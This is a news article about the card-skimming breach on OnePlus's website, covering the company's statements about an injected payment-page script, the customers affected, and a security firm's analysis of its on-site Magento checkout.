Reports began to surface last weekend from people who had made purchases on smartphone startup OnePlus’ website then seeing unauthorized transactions appear on their credit cards. OnePlus quickly released a statement on its website saying it had been hacked, “and up to 40K users at oneplus.net may be affected by the incident”. They have emailed all potentially affected users. Users who entered their credit card information into oneplus.net between mid-November 2017 and January 11, 2018 have potentially been affected. Those customers who used a saved credit card or used Paypal should not be affected.
OnePlus updated the statement today to release further information. It described a malicious script having been injected into its payment page code “to sniff out credit card while it was being entered”, intermittently capturing and sending data directly from the user’s browser. The startup reassured its customers that the malware has since been eliminated; they have quarantined the infected server and “reinforced all relevant system structures”.
OnePlus advised all customers who visited the site during that time and entered their credit card information to check their card statements and report any unauthorized transactions to their bank.
OnePlus also said it was temporarily suspending credit card payments on its site. Payments via PayPal are still available. It continues to carry out an investigation into what happened, and said “we are working with our providers and local authorities to better address the incident”.
The investigation started following a poll posted by users on OnePlus’ forums showed that many customers had experienced similar problems. 174 respondents to the poll said they had found fake transactions on their cards following making a purchase from OnePlus.
New security firm Fidus (“founded by two penetration testers” in Cambridge, UK) decided to do their own investigation into the current structure of the payment flow on OnePlus’ site and speculate how it could have been achieved. Fidus immediately noted that OnePlus is using the Magento eCommerce platform, which has experienced a serious level of credit card hacking previously. Fidus also noticed “the payment page which requests the customer’s card details is hosted ON-SITE”. They added, “This means all payment details entered, albeit briefly, flow through the OnePlus website and can be intercepted by an attacker. Whilst the payment details are sent off to a third-party provider upon form submission, there is a window in which malicious code is able to siphon credit card details before the data is encrypted.”
Credit card fraud has been apparent on the Magento eCommerce platform since 2015.
In its statement, OnePlus said they were “working with our current payment providers to implement a more secure credit card payment method”, and conducting “an in-depth security audit” to prevent such incidents from occurring in the future.